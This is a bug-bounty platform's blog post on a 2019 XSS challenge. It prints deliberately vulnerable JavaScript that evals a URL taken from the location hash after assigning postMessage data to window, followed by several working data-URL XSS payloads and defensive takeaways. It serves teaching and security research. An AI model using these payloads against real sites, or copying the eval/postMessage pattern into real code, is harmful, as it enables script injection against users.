The XSS challenge that +100k people saw but only 90 solved

CHALLENGE: Can you find the XSS? 🧐 Earn a Burp License, cool swag & private invites! 👉https://t.co/EehqBfFmjA pic.twitter.com/sq8FIYgQOH

— Intigriti (@intigriti) April 29, 2019

A couple of days ago we released a XSS challenge. A few hours after sending out the tweet, we noticed the success of this. Therefore, we decided to share a blogpost with the lovely community.

<a href="https://poll.fm/10311886" target="_blank" rel="noopener noreferrer">Take Our Poll</a>

For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case it’s not available anymore or you want to host the challenge yourself, you can find the code below.

  
  const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|/gi, "forbidden");
  const iframe = document.createElement("iframe"); iframe.src = url; document.body.appendChild(iframe);
  iframe.onload = function(){ window.addEventListener("message", executeCtx, false);}
  function executeCtx(e) {
    if(e.source == iframe.contentWindow){
      e.data.location = window.location;
      Object.assign(window, e.data);
      eval(url);
    }
  }

Solution

We could write an in detail explanation on how to solve this challenge, but we couldn’t do a better job than Dominic and dPhoeniixx. Both researchers shared a well written and very detailed blogpost. You can find the link below.

Solution of Dominic

The @intigriti XSS Challenge is over! Here's a writeup I did explaining my solution and how I got there! https://t.co/075tIcIb39 … Thanks for the super fun challenge! pic.twitter.com/OnpTM35tne

— Dominic (@dee__see) May 3, 2019

Solution of DPhoenixx

Wondering how this challenge could be solved via a different way? Take a look at the payloads shared below.

https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==

by n0tm3

https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E

by Karel_Origin

https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11

by terjanq

https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e

by daudmalik06

https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E

by _zulln

One of the most common mistakes we saw was people executing the alert box inside the iframe. But that is not valid solution because the javascript doesn’t get triggered on challenge.intigriti.io but in the iframe itself (domain = null).

Overview of the tips

The four tips shared during the challenge:

First tip: “It’s all about that base, ’bout that base”.

Second tip: “Define the undefined”.

Third tip: “You don’t need any external resources.”

Forth tip: “Look for the charset.”

Key takeaways

• Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger tool built-in your browser.

• Do not trust user input. Input validation is the key!

• Seeing a message event? Make sure you check the origin?

• Avoid the usage of eval().

• Do not give up. Patience is key.

Thank you!

A special thanks to @filedescriptor and @edoverflow for hardening our challenge!

Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.

The XSS Challenge is over! Thank you all for participating. We had a whopping 90 valid submissions but there can only be one winner. Check the video below to discover who's getting a Burp Pro License and an exclusive @intigriti swag package! #HackWithIntigriti #CTF #BugBounty pic.twitter.com/l2tNzYwJGB

— Intigriti (@intigriti) May 3, 2019

Want more?

Follow us on twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.